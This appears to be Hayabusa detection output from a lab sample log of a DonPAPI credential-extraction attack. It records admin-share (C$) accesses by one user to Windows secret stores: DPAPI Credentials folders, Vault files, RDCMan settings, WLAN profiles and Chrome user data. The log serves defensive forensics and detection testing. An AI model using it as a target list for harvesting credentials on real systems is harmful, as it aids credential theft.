Users\Default\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.686 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.686 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.686 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.686 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.686 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.686 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.701 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.701 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.701 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.701 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.701 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File 
Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.701 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.717 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.717 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.717 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.733 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.733 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.733 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.733 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.733 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 
16:16:02.733 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.748 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.748 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.748 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.748 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.748 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.748 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.748 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.765 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.765 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.765 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.765 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Wlansvc\Profiles\Interfaces | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.765 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Vault | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.780 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\Policy.vpol | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.796 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.796 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.796 
+09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.796 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28 | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.796 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Microsoft\Vault | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.796 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.813 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.815 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\Policy.vpol | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.702 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.702 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204 | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.717 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.717 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\154E23D0-C644-4E6F-8CE6-5069272F999F.vsch | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\2F1A6504-0641-44CF-8BB5-3612D865F2E5.vsch | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.735 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.735 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.735 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\3CCD5499-87A8-4B10-A215-608888DD3B55.vsch | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.750 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.750 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.750 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\system32\config\systemprofile\AppData\Local\Microsoft\Vault | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.750 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
